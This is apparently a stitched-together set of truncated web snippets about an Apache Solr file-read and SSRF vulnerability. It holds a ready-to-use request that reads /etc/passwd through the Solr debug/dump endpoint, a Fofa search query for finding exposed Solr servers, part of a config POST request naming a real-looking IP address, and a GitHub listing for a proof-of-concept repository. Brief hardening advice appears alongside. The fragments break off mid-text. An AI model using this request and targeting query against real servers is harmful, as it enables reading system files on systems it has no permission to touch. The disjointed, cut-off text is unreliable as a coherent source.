http://x.x.x.x:8983/solr/records/debug/dump?stream.file=/etc/passwd¶m=ContentStream 目标检索 Fofa: 代码语言:javascript 复制 app="APACHE-Solr" 安全建议 1、开启身份验证/授权,参考官方文档: https://lucene.apache.org/solr/guide/8_6/authentication-and-authorization-plugins.html 2. 配置防火墙...
POST /solr/ckan/config HTTP/1.1 Host: xxx.xxx.xxx:8983 Content-Length: 99 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://118.31.46.134:8983 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko...
W2Ning / Solr-SSRF Public Notifications Fork 1 Star 0 Code Issues Pull requests Actions Projects Security Insights Files main Apache-Solr-FileRead-SSRF.burp README.md example.png poc-yaml-Solr-SSRF.ymlBreadcrumbs Solr-SSRF / Apache-Solr-FileRead-SSRF.burp ...